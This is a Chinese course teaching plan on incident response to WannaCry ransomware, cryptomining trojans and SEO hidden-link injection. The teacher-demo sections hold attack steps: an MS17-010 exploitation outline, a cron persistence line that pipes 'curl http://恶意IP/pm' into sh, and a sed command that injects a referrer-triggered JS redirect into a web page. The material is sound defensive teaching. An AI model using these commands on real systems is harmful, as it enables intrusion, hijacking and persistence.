《工业互联网安全防护技术》教学设计 项目七 工业互联网安全运维（二）

《工业互联网安全防护技术》教学设计课程名称：工业互联网安全防护技术授课年级：授课学期：教师姓名：年月日课题名称项目七工业互联网安全运维计划学时3学时内容分析工业互联网安全运维，该项目例举了一些工业互联网运维中常见网络攻击，并针对此攻击给出应急处理方法。有勒索病毒攻击、挖矿攻击、暗链攻击，介绍了如何判断被攻击，找出受攻击的漏洞及应急防御措施；教学目标及基本要求1.了解病毒攻击的基本原理和过程。2.掌握病毒攻击的应急响应的流程。3.能够模拟病毒攻击应急响应演练的过程。4.强化涉密系统管理法律意识教学重点操作系统及应用程序配置的基本安全要求。操作系统及应用程序加固的方法。教学难点操作系统及应用程序加固的方法。教学方式教学采用教师课堂讲授为主，结合PPT、案例进行讲解教学过程第一二课时Wannacry勒索病毒应急响应教学目标：1.理解勒索病毒的攻击原理与危害。2.掌握勒索病毒应急响应的全流程。3.能通过模拟演练完成攻击检测、隔离与恢复操作。4.强化网络安全法律意识（《保密法》第二十四条）。一、创设情境，导入新课（10分钟）情境设计：“某医院系统突发故障：所有患者档案被加密为`.wnry`后缀文件，桌面弹出红色勒索信，要求支付比特币赎金。医院业务瘫痪，急需恢复系统！”提问：1.这可能是什么类型的攻击？2.如何快速止损并恢复业务？导入：展示真实WannaCry事件图片（如2017年全球攻击地图）。引出主题：勒索病毒攻击原理与应急响应流程。二、重点知识讲解（25分钟）（一）勒索病毒基础1.定义与传播途径：通过RDP爆破、邮件木马、漏洞传播（如永恒之蓝）。双重勒索趋势：窃取数据→加密→威胁公开。2.危害表现（结合案例）：CPU占用100%、文件加密、后缀修改、勒索信。（二）攻击流程解析（结合图8-5-2）|阶段|攻击行为||----------------|-------------------------------||探测侦察|扫描漏洞、收集目标信息||攻击入侵|利用永恒之蓝漏洞获取权限||病毒植入|上传勒索程序，横向扩散||实施勒索|加密文件+展示赎金要求|（三）法律素养强化《保密法》第二十四条解读：❗禁止涉密设备接入公网、禁止弱口令/未打补丁、数据必须多重备份。三、实践操作演练（40分钟）环境：Kali（攻击机）+Win7（靶机）目标：模拟攻击→应急响应→文件恢复步骤：1.攻击模拟（教师演示）：Kali扫描靶机445端口→利用MS17-010漏洞上传`wcry.exe`→运行病毒加密文件。观察现象：文件后缀变`.wnry`，弹出勒索信。2.应急响应（学生分组操作）：|阶段|操作内容||------------|----------------------------------------------||事中|①立即断网隔离靶机；②关闭445/3389等端口。||事前|③为其他主机打MS17-010补丁；④关闭IPC$共享。||事后|⑤使用`QaxDecryptor.exe`尝试解密文件。|3.工具实践：在[奇安信勒索病毒搜索引擎](/)输入病毒特征，验证是否可解密。四、归纳总结（10分钟）1.响应流程口诀：断网隔离→堵漏补丁→关端口/共享→备份恢复→法律合规2.防护核心：三不三要：不点可疑链接、要备份数据、要更新补丁。端口管理：关闭139/445/3389等高风险端口。3.法律红线：涉密系统严禁外联、弱口令与漏洞未修复等同于违规！五、课后作业（5分钟）1.基础题：简述勒索病毒攻击的四个阶段及其关键技术。列出《保密法》中与勒索病毒防护相关的两条法规。2.实践题：在虚拟机环境中，独立完成一次漏洞修补（MS17-010）及端口关闭操作。3.拓展题：调研一个真实勒索病毒事件（如ColonialPipeline），分析其应急响应得失。第三四课时挖矿木马应急响应教学目标：1.理解挖矿木马的工作原理与危害特征2.掌握挖矿木马应急响应的标准流程3.能通过Linux环境完成攻击检测与清除操作4.强化个人信息保护法律意识（《个人信息保护法》第十六条）一、情境创设与概念导入（15分钟）真实案例导入："某公司服务器持续卡顿，空调异常耗电，IT部门发现：CPU占用率长期达98%异常进程minerd持续运行定时任务被恶意修改"*核心问题：1.这些现象可能是什么攻击？2.如何快速定位并清除威胁？挖矿木马本质解析：（一）攻击原理三维度|传播途径|技术手段|目标设备||--------------------|-----------------------|-----------------||漏洞利用|永恒之蓝/MS17-010|服务器/PC||弱口令爆破|Redis/SSH/3389爆破|云主机||恶意脚本|Cron定时任务持久化|容器环境|（二）危害特征识别资源占用：持续高CPU（90%）异常进程：minerd/xmrig等矿工程序隐蔽通道：恶意定时任务（crontab）温度异常：硬件发热量骤增（三）法律关联《个人信息保护法》第十六条解读：⚠️未经授权占用计算资源=侵犯数字财产权三、实践操作演练（40分钟）环境：CentOS7（攻击机+受害机）工具：minerd挖矿程序、top/crontab命令攻击模拟（教师演示）：1.编译安装挖矿程序gitclone/pooler/cpuminercdcpuminer&&./autogen.sh&&./configureCFLAGS="-O3"make&&makeinstall2.配置矿池连接minerd--url=stratum+tcp://:3333-u账号-p密码3.植入持久化脚本echo"*/1****curlhttp://恶意IP/pm|sh"/var/spool/cron/root应急响应实战（学生操作）：mermaidflowchartTDA[发现异常高CPU]-B{定位恶意进程}B--|top命令|C[识别minerd]C-D[检查定时任务]D--|crontab-l|E[删除恶意任务]E-F[终止进程]F--|kill-9PID|G[清除程序文件]G-H[全盘扫描残留]关键命令清单：1.监控进程top-c按CPU排序显示进程2.检查定时任务crontab-l查看当前用户任务ls/var/spool/cron/检查系统级任务3.定位程序路径ls-l/proc/<PID/exe查看进程对应执行文件4.清除操作kill-9<PID强制终止进程rm-f/usr/local/bin/minerd删除程序find/-nameminerd-delete全盘扫描残留四、归纳总结（10分钟）响应流程口诀：查CPU→定进程→溯文件→清任务→杀残留防护矩阵：|防线|具体措施||------------|----------------------------------||系统层面|定期更新补丁/关闭高危端口||账号层面|强密码策略/禁用默认账户||监控层面|部署EDR系统/设置CPU使用阈值告警||法律底线|禁止未经授权的资源占用|五、课后作业1.基础任务简述挖矿木马三种传播方式及对应防护措施编写脚本自动检测：CPU持续90%且含"minerd"进程2.进阶挑战样本分析任务stringsminerd|grep'pool'提取矿池连接信息chkrootkit-q检查Rootkit痕迹3.法律思考某公司利用用户设备偷偷挖矿，违反《个人信息保护法》哪些条款？应承担什么责任？安全规范：所有操作必须在隔离的虚拟机环境中进行矿池账号使用测试凭证（非真实货币账户）禁止在物理机执行任何攻击代码第五六课时暗链植入攻击应急响应教学目标：1.理解暗链攻击的技术原理与危害特征2.掌握暗链检测与清除的标准化流程3.能通过CentOS环境完成应急响应演练4.强化涉密系统管理法律意识（《保密法》第二十四条）一、情境创设与概念导入（15分钟）真实案例切入：“某政府网站通过搜索引擎访问时自动跳转到赌博网站，直接输入域名则正常。经调查，黑客利用Struts2漏洞植入暗链脚本，致使网站公信力受损并被网信部门通报。”核心问题驱动：1.为何搜索引擎访问与直接访问行为不同？2.暗链如何绕过管理员日常监控？暗链本质解析：二、核心知识精讲（20分钟）（一）暗链攻击原理与分类|类型|技术实现|隐蔽性|检测难度||HTML隐藏型|CSS/JS隐藏元素（display:none）|低|易||JS引入型|动态加载外部脚本跳转|高|难||IIS模块型|篡改服务器DLL全局劫持流量|极高|极难|（二）攻击危害全景法律风险：涉密系统被植入暗链→违反《保密法》第24条（涉密设备违规外联）经济损害：SEO权重被恶意转移→企业商业价值流失声誉危机：政府/教育网站跳转色情赌博→公信力崩塌（三）法律红线强调《保密法》第二十四条核心禁令：❗禁止涉密设备接入公网|❗禁止非授权数据交换|❗禁止卸载安全程序三、实战演练（40分钟）环境：CentOS7（攻击机5+受害机4）阶段1：攻击模拟（教师演示）1.漏洞利用植入暗链：定位网站首页find/-nameindex.html篡改代码：插入JS跳转脚本sed-i'/<head>/a<script>if(document.referrer.indexOf("baidu")>0){self.location="";}</script>'/var/www/html/index.html2.效果验证：直接访问→显示正常页面模拟搜索引擎访问→跳转博彩网站阶段2：应急响应（学生操作）关键操作清单：1.日志溯源：分析Apache访问日志cat/var/log/httpd/access_log|grep'index.html'|awk'{print$1,$11}'定位攻击源IP（例：5）2.深度检测：检查IIS模块（Windows场景）：`Get-WebGlobalModule|Where-Object{$_.Name-notmatch"Microsoft"}`扫描隐藏后门：`rkhunter--checkall`3.系统加固：关闭无用端口firewall-cmd--remove-port=445/tcp--permanent设置文件防篡改chattr+i/var/www/html/index.html四、法律与防护融合（10分钟）防护矩阵：|防线|技术措施|管理要求||系统